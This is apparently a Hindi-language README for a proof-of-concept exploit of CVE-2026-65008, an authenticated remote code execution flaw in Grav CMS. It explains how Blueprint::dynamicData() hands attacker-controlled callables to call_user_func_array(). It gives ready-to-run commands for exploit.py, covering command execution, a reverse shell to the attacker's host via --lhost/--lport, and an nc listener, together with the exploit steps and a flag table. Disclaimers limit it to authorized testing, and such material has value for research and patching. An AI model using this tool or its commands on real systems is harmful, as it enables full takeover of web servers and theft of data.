
CVE-2026-65008
CVE-2026-65008 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Blueprint::dynamicData() में अप्रतिबंधित call_user_func_array() के माध्यम से Grav CMS में प्रमाणित रिमोट कोड निष्पादन।
admin.pages (या api.pages.write) वाला उपयोगकर्ता एक दुर्भावनापूर्ण फ़ॉर्म फ्रंटमैटर लगा सकता है। पेलोड तब किसी भी विज़िटर (अप्रमाणित सहित) द्वारा पेज लोड किए जाने पर वेब-सर्वर उपयोगकर्ता के रूप में निष्पादित होता है।
केवल अधिकृत परीक्षण। केवल उन्हीं सिस्टम पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है।
| भूमिका | |
|---|---|
| भेद्यता रिपोर्टकर्ता | YuvalMil, MatiHub25, LeonKaya |
| विक्रेता सलाह | GHSA-fj2p-qj2f-74v5 |
| यह रिपॉज़िटरी | स्वतंत्र प्रयोगशाला PoC / स्वचालन |
CVE: https://www.cve.org/CVERecord?id=CVE-2026-65008
Blueprint::dynamicData() हमलावर-नियंत्रित Class::method कॉल करने योग्य (callable) और तर्कों को बिना किसी अनुमति-सूची (allowlist) के PHP call_user_func_array() को पास करता है। ट्रैम्पोलिन के रूप में Grav\Common\Utils::arrayFilterRecursive के साथ मिलकर, यह system() / passthru / आदि तक पहुँचता है।
Grav 2.0.7+ में पैच किया गया।
9.8 गंभीर (CRITICAL) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
requestsइंस्टॉल करें:
pip install -r requirements.txt
python3 exploit.py -u http://TARGET -U admin -P 'password' -c "id"
पहले लिसनर प्रारंभ करें:
nc -lvnp 4444
फिर:
python3 exploit.py -u http://TARGET -U admin -P 'password' --lhost YOUR_IP --lport 4444
/admin में लॉगिन करें (login-nonce निकालें)admin_nonce प्राप्त करेंdata-opts@: गैजेट होwww-data के रूप में RCEयह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है। तृतीय-पक्ष सिस्टम का परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें। मूल भेद्यता विक्रेता सलाह के माध्यम से प्रकट की गई थी; यह रिपॉज़िटरी केवल प्रयोगशाला पुनरुत्पादन प्रदर्शित करती है।
अनुसंधान उपयोग के लिए। कोई वारंटी नहीं।
| फ़्लैग | विवरण |
|---|
-u, --url | लक्ष्य आधार URL (आवश्यक) |
-U, --username | एडमिन / पेज-संपादन उपयोगकर्ता (डिफ़ॉल्ट: admin) |
-P, --password | पासवर्ड (आवश्यक) |
-c, --command | चलाने के लिए कमांड (डिफ़ॉल्ट: id) |
--lhost | रिवर्स शेल LHOST |
--lport | रिवर्स शेल LPORT (डिफ़ॉल्ट: 4444) |
--folder | पेज फ़ोल्डर नाम (डिफ़ॉल्ट: rcepoc) |
--no-verify | TLS सत्यापन अक्षम करें |